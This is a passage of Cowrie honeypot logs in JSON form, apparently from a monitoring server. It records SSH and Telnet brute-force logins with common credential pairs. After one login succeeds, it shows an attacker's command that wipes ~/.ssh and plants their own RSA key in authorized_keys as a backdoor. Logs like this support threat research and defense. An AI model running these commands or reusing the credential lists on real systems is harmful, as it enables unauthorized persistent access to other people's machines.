{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:55:36.795151Z","src_ip":"212.227.235.229","session":"d4e446bb4f41"}
{"eventid":"cowrie.session.closed","duration":"6.0","message":"Connection lost after 6.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:55:36.797737Z","src_ip":"212.227.235.229","session":"d4e446bb4f41"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52064,"dst_ip":"1.2.3.4","dst_port":22,"session":"e2732ae286a5","protocol":"ssh","message":"New connection: 212.227.235.229:52064 (1.2.3.4:22) [session: e2732ae286a5]","sensor":"my-vps","timestamp":"2025-09-08T22:55:41.555898Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:55:41.556850Z","src_ip":"212.227.235.229","session":"e2732ae286a5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:55:41.890039Z","src_ip":"212.227.235.229","session":"e2732ae286a5"}
{"eventid":"cowrie.login.failed","username":"tester","password":"P@ssw0rd","message":"login attempt [tester/P@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-09-08T22:55:43.263901Z","src_ip":"212.227.235.229","session":"e2732ae286a5"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:55:44.600298Z","src_ip":"212.227.235.229","session":"e2732ae286a5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38272,"dst_ip":"1.2.3.4","dst_port":22,"session":"abb214936f84","protocol":"ssh","message":"New connection: 212.227.235.229:38272 (1.2.3.4:22) [session: abb214936f84]","sensor":"my-vps","timestamp":"2025-09-08T22:55:45.408679Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:55:45.409473Z","src_ip":"212.227.235.229","session":"abb214936f84"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:55:45.640713Z","src_ip":"212.227.235.229","session":"abb214936f84"}
{"eventid":"cowrie.login.failed","username":"tom","password":"12345678","message":"login attempt [tom/12345678] failed","sensor":"my-vps","timestamp":"2025-09-08T22:55:46.610648Z","src_ip":"212.227.235.229","session":"abb214936f84"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:55:47.844167Z","src_ip":"212.227.235.229","session":"abb214936f84"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46052,"dst_ip":"1.2.3.4","dst_port":22,"session":"80916743577f","protocol":"ssh","message":"New connection: 212.227.235.229:46052 (1.2.3.4:22) [session: 80916743577f]","sensor":"my-vps","timestamp":"2025-09-08T22:56:03.935044Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:56:03.935975Z","src_ip":"212.227.235.229","session":"80916743577f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:56:04.035366Z","src_ip":"212.227.235.229","session":"80916743577f"}
{"eventid":"cowrie.login.failed","username":"lsfadmin","password":"12345","message":"login attempt [lsfadmin/12345] failed","sensor":"my-vps","timestamp":"2025-09-08T22:56:04.476167Z","src_ip":"212.227.235.229","session":"80916743577f"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:56:05.577920Z","src_ip":"212.227.235.229","session":"80916743577f"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:56:14.500968Z","src_ip":"212.227.235.229","session":"fba3a92d94c3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55736,"dst_ip":"1.2.3.4","dst_port":22,"session":"4629aba22ac7","protocol":"ssh","message":"New connection: 212.227.235.229:55736 (1.2.3.4:22) [session: 4629aba22ac7]","sensor":"my-vps","timestamp":"2025-09-08T22:56:21.021083Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:56:21.022435Z","src_ip":"212.227.235.229","session":"4629aba22ac7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:56:21.333552Z","src_ip":"212.227.235.229","session":"4629aba22ac7"}
{"eventid":"cowrie.session.connect","src_ip":"176.65.149.186","src_port":46934,"dst_ip":"1.2.3.4","dst_port":23,"session":"a17c2f9eb9b1","protocol":"telnet","message":"New connection: 176.65.149.186:46934 (1.2.3.4:23) [session: a17c2f9eb9b1]","sensor":"my-vps","timestamp":"2025-09-08T22:56:22.262878Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:56:22.300955Z","src_ip":"176.65.149.186","session":"a17c2f9eb9b1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:56:22.383544Z","src_ip":"176.65.149.186","session":"a17c2f9eb9b1"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-09-08T22:56:22.384654Z","src_ip":"176.65.149.186","session":"a17c2f9eb9b1"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-09-08T22:56:22.385430Z","src_ip":"176.65.149.186","session":"a17c2f9eb9b1"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"Admin@123","message":"login attempt [ubuntu/Admin@123] failed","sensor":"my-vps","timestamp":"2025-09-08T22:56:22.697582Z","src_ip":"212.227.235.229","session":"4629aba22ac7"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:56:24.011201Z","src_ip":"212.227.235.229","session":"4629aba22ac7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40220,"dst_ip":"1.2.3.4","dst_port":22,"session":"e3ec02a8da84","protocol":"ssh","message":"New connection: 212.227.235.229:40220 (1.2.3.4:22) [session: e3ec02a8da84]","sensor":"my-vps","timestamp":"2025-09-08T22:56:24.090578Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:56:24.091329Z","src_ip":"212.227.235.229","session":"e3ec02a8da84"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:56:24.190916Z","src_ip":"212.227.235.229","session":"e3ec02a8da84"}
{"eventid":"cowrie.login.success","username":"root","password":"aa112233","message":"login attempt [root/aa112233] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:56:24.631475Z","src_ip":"212.227.235.229","session":"e3ec02a8da84"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:56:24.849585Z","src_ip":"212.227.235.229","session":"e3ec02a8da84"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:56:24.850316Z","src_ip":"212.227.235.229","session":"e3ec02a8da84"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:56:24.851484Z","src_ip":"212.227.235.229","session":"e3ec02a8da84"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:56:24.952682Z","src_ip":"212.227.235.229","session":"e3ec02a8da84"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:56:25.261223Z","src_ip":"212.227.235.229","session":"e3ec02a8da84"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:56:25.261983Z","src_ip":"212.227.235.229","session":"e3ec02a8da84"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:56:25.365265Z","src_ip":"212.227.235.229","session":"e3ec02a8da84"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:56:25.366240Z","src_ip":"212.227.235.229","session":"e3ec02a8da84"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40228,"dst_ip":"1.2.3.4","dst_port":22,"session":"a0bc573f9a31","protocol":"ssh","message":"New connection: 212.227.235.229:40228 (1.2.3.4:22) [session: a0bc573f9a31]","sensor":"my-vps","timestamp":"2025-09-08T22:56:25.460689Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:56:25.461665Z","src_ip":"212.227.235.229","session":"a0bc573f9a31"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:56:25.557644Z","src_ip":"212.227.235.229","session":"a0bc573f9a31"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:56:25.980412Z","src_ip":"212.227.235.229","session":"a0bc573f9a31"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:56:27.079558Z","src_ip":"212.227.235.229","session":"a0bc573f9a31"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49576,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ecf2c743d4f","protocol":"ssh","message":"New connection: 212.227.235.229:49576 (1.2.3.4:22) [session: 7ecf2c743d4f]","sensor":"my-vps","timestamp":"2025-09-08T22:56:27.178647Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:56:27.179677Z","src_ip":"212.227.235.229","session":"7ecf2c743d4f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:56:27.279129Z","src_ip":"212.227.235.229","session":"7ecf2c743d4f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:56:27.726304Z","src_ip":"212.227.235.229","session":"7ecf2c743d4f"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:56:27.828369Z","src_ip":"212.227.235.229","session":"e3ec02a8da84"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:56:27.829267Z","src_ip":"212.227.235.229","session":"7ecf2c743d4f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53304,"dst_ip":"1.2.3.4","dst_port":22,"session":"90ba6de4b81a","protocol":"ssh","message":"New connection: 212.227.235.229:53304 (1.2.3.4:22) [session: 90ba6de4b81a]","sensor":"my-vps","timestamp":"2025-09-08T22:56:33.261395Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:56:33.286371Z","src_ip":"212.227.235.229","session":"90ba6de4b81a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],